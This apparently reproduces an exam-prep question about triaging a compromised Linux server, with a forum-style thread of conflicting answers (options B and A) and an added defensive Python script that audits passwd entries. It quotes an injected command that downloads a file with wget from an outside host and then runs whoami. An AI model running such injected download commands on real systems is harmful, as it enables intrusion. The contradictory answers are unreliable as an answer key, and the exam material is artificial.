An incident response team member is triaging a Linux server. The output is shown below:
Which of the following is the adversary most likely trying to do?
The adversary is most likely trying to execute commands through an unsecured service account. In the provided output, there is evidence of an attempt to use the 'wget' command to retrieve a file followed by an attempt to determine the current user ('whoami'). This suggests that the attacker is utilizing the service account to execute unauthorized commands, potentially exploiting a vulnerability to gain further access or control over the system.
Looking at the output, I see that it is running container.getInstance.(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami). Of the options proposed, it seems that option B is the most logical answer.
I'm thinking B here.
It is B. There is no indication in the provided logs or user account information that a backdoor root account named zsh is being created. The /etc/passwd file does not show a user with such a name or hint towards such an action. This option seems less likely based on the information given. Normally, service accounts like http (associated with the HTTP service) should have minimal permissions and use restrictive shells like /usr/bin/nologin. The presence of a shell like /bin/bash may allow an attacker to execute commands if they manage to exploit the service.
Based on the provided image, the adversary is most likely trying to create a backdoor root account named zsh (Option A). This conclusion is drawn from the presence of a user account named ‘zsh’ with root privileges in the /etc/passwd file, which is a common tactic used by attackers to maintain persistent access to a compromised system.
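Since the thread turns on what /etc/passwd shows (a second UID-0 account versus a service account with an interactive shell), here is an added Python audit script, not part of the original discussion, that flags both conditions on constructed sample entries; the assumption that UIDs below 1000 are system accounts is a common convention, not something the question states.

```python
"""Audit /etc/passwd-style entries for the two signals debated above.

Added example, not taken from the triaged server: flags any UID-0 account
other than root, and any system/service account whose shell is interactive
rather than a nologin/false shell.  The sample entries are constructed.
"""

NOLOGIN_SHELLS = {"/usr/bin/nologin", "/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}
SYSTEM_UID_MAX = 999  # assumption: UIDs below 1000 are system/service accounts

# Constructed sample: an 'http' service account with /bin/bash and an extra UID-0 user.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
http:x:33:33::/srv/http:/bin/bash
zsh:x:0:0::/root:/bin/zsh
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""


def parse_passwd(text):
    """Yield (name, uid, shell) for each well-formed passwd line."""
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            continue  # skip malformed or truncated lines instead of crashing
        yield fields[0], int(fields[2]), fields[6]


def audit_passwd(text):
    """Return (account, finding) pairs for entries worth a closer look."""
    findings = []
    for name, uid, shell in parse_passwd(text):
        if name == "root":
            continue  # root itself is expected to have UID 0 and a real shell
        if uid == 0:
            findings.append((name, "extra UID-0 account (possible backdoor root)"))
        elif uid <= SYSTEM_UID_MAX and shell not in NOLOGIN_SHELLS:
            findings.append((name, f"service account with interactive shell {shell}"))
    return findings


if __name__ == "__main__":
    for account, finding in audit_passwd(SAMPLE_PASSWD):
        print(f"{account}: {finding}")
```

On a real host, read /etc/passwd into `audit_passwd` and treat either finding as a lead to confirm against the rest of the evidence rather than as proof by itself.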